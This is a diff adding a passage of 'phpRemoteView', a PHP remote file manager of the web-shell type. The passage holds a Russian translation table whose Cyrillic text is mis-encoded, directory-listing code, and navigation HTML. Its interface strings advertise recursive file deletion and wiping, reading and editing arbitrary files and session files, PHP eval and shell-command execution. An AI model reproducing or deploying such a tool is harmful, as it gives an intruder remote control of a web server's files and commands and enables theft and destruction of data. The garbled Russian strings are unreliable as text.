+"MAKE DIR"=>"ÑÎÇÄÀÒÜ ÊÀÒÀËÎÃ",
+"type full path"=>"ââåäèòå ïîëíûé ïóòü",
+"MkDir"=>"Ñîçä.Êàò.",
+"CREATE NEW FILE or override old file"=>"ÑÎÇÄÀÒÜ ÍÎÂÛÉ ÔÀÉË èëè ïåğåçàïèñàòü ñòàğûé",
+"CREATE/OVERRIDE"=>"ÑÎÇÄÀÒÜ/ÏÅĞÅÇÀÏÈÑÀÒÜ",
+"select file on your local computer"=>"âûáğàòü ôàéë íà âàøåì ëîêàëüíîì êîìïüşòåğå",
+"save this file on path"=>"ñîõğàíèòü ıòîò ôàéë â êàòàëîã",
+"create file name automatic"=>"ïğèäóìàòü èìÿ ôàéëó àâòîìàòè÷åñêè",
+"OR"=>"ÈËÈ",
+"type any file name"=>"ââåñòè èìÿ ôàéëà âğó÷íóş",
+"convert file name to lovercase"=>"êîíâåğòèğîâàòü èìÿ â íèæíèé ğåãèñòğ",
+"Send File"=>"Ïîñëàòü ôàéë",
+"Delete all files in dir"=>"Óäàëèòü âñå ôàéëû",
+"Delete all dir/files recursive"=>"Óäàëèòü ÂÑÅ +ïîäêàòàëîãè ğåêóğñèâíî",
+"Confirm not found (go back and set checkbox)"=>"Ïîäòâåğæäåíèå íå ïîñòàâëåíî (âåğíèòåñü íàçàä è ïîñòàâüòå ãàëî÷êó)",
+"Delete cancel - File not found"=>"Óäàëåíèå îòìåíåíî - Ôàéë íå íàéäåí",
+"YES"=>"ÄÀ",
+"ME"=>"ÌÅÍß",
+"NO (back)"=>"ÍÅÒ (íàçàä)",
+"Delete cancel"=>"Óäàëåíèå îòìåíåíî",
+"ACCESS DENIED"=>"ÄÎÑÒÓÏ ÇÀÏĞÅÙÅÍ",
+"done (go back)"=>"ãîòîâî (íàçàä)",
+"Delete ok"=>"Îê, óäàëåííî",
+"Touch cancel"=>"Îáíîâëåíèå îòìåíåíî",
+"Touch ok (set current time to 'modify time')"=>"Îáíîâëåíèå çàâåğøåíî (ôàéëó ïğèñâîåíî òåêóùåå âğåìÿ ìîäèôèêàöèè)",
+"Clean (empty file) cancel"=>"Î÷èùåíèå (îáíóëåíèå ôàéëà) îòìåíåíî",
+"Clean ok (file now empty)"=>"Îê, î÷èùåíî (ôàéë îáíóëåí)",
+"Wipe cancel - access denied"=>"Óíè÷òîæåíèå îòìåíåíî - äîñòóï çàïğåùåí",
+"Wipe ok (file deleted)"=>"Îê, óíè÷òîæåíî (è ôàéë ñòåğò)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"Óäàëåíèå âñåõ ôàéëîâ â",
+"skip"=>"ïğîïóñê",
+"deleting"=>"óäàëåíèå",
+"Deleting all dir/files (recursive) in"=>"Óäàëåíèå âñåõ ôàéëîâ/ïîäêàòàëîãîâ (ğåêóğñèâíî)",
+"DONE, go back"=>"ÃÎÒÎÂÎ, íàçàä",
+"DONE"=>"ÃÎÒÎÂÎ",
+"file not found"=>"ôàéë íå íàéäåí",
+"ONLY READ ACCESS (don't edit!)"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ (íå ğåäàêòèğîâàòü)",
+"Can't READ file - access denied (don't edit!)"=>"Íå ìîãó ×ÈÒÀÒÜ ôàéë - äîñòóï çàïğåùåí",
+"EDIT FILE"=>"ÏĞÀÂÈÒÜ ÔÀÉË",
+"can't open, access denied"=>"íå ìîãó îòêğûòü, äîñòóï çàïğåùåí",
+"SAVE FILE (write to disk)"=>"ÑÎÕĞÀÍÈÒÜ ÔÀÉË (çàïèñü íà äèñê)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"Âû äîëæíû îòìåòèòü ãàëî÷êó [ñîçäàòü ôàéë àâòîìàòè÷åñêè] èëè ââåñòè â ïîëå èìÿ ôàéëà!'",
+"SAVING TO"=>"ÑÎÕĞÀÍÈÒÜ Â",
+"Sorry, access denied"=>"Èçâèíèòå, äîñòóï çàïğåùåí",
+"for example, uncomment next line"=>"äëÿ ïğèìåğà, ğàñêîììåíòèğóéòå ñëåäóşùóş ñòğîêó",
+"Eval PHP code"=>"Âûïîëíèòü PHP êîä",
+"don't type"=>"íå ïèøèòå",
+"and"=>"è",
+"example (remove comments '#')"=>"ïğèìåğ (óäàëèòå êîììåíòàğèè '#')",
+"Shell commands"=>"Êîìàíäû Shell'a",
+"filesize to 0byte"=>"ğàçìåğ â 0 áàéò",
+"from"=>"îò",
+"to"=>"â",
+"Full file name"=>"Ïîëíîå èìÿ ôàéëà",
+"Can't open directory"=>"Íå ìîãó îòêğûòü êàòàëîã",
+"setup"=>"íàñòğîéêà",
+"back"=>"íàçàä",
+"Reset all settings"=>"Ñáğîñèòü âñå íàñòğîéêè",
+"clear"=>"î÷èñòèòü",
+"Current"=>"Òåêóùèå",
+"Colums and sort"=>"Êîëîíêè è ñîğòèğîâêà",
+"Sort order"=>"Ïîğÿäîê ñîğòèğîâêè",
+"Ascending sort"=>"Ïî âîçğàñòàíèş",
+"Descending sort"=>"Ïî óáûâàíèş",
+"Sort by filename"=>"Ñîğòèğîâàòü ïî èìåíè ôàéëà",
+"Sort by filename extension"=>"Ñîğòèğîâàòü ïî ğàñøèğåíèş ôàéëà",
+"Date/time format"=>"Ôîğìàò äàòû/âğåìåíè",
+"Panel font & size"=>"Øğèôò/ğàçìåğ ïàíåëè",
+"Setup"=>"Îïöèè",
+"Char map"=>"Ñèìâîëû",
+"Language"=>"ßçûê",
+"English"=>"Àíãëèéñêèé",
+"Russian"=>"Ğóññêèé",
+"Character map (symbol codes table)"=>"Òàáëèöà ñèìâîëîâ",
+"Select font"=>"Âûáåğèòå øğèôò",
+"or type other"=>"èëè ââåäèòå äğóãîé",
+"Font size"=>"Ğàçìåğ øğèôòà",
+"Code limit"=>"Äèïàçîí êîäîâ",
+"Generate table"=>"Ñãåíåğèğîâàòü òàáëèöó",
+"Universal convert"=>"Óíèâåğñàëüíûå êîíâåğòàöèè"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"Òèï",
+'n'=>"Èìÿ",
+'s'=>"Ğàçìåğ",
+'o'=>"Âëàäåëåö",
+'g'=>"Ãğóïïà",
+'a'=>"Âëàäåëåö/Ãğóïïà",
+'c'=>"Ïğàâà",
+'1'=>"Ñîçäàí",
+'2'=>"Èçìåíåí",
+'3'=>"Äîñòóï"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="••";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+                  break;
+               default:
+                  echo jsval("??");
+                  break;
+               }
+               break;
+            
+            case "s": 
+               if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); 
+               else echo jsval(''); 
+               break;
+            
+            case "o": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               echo jsval($tow);
+               break;
+            
+            case "g": 
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
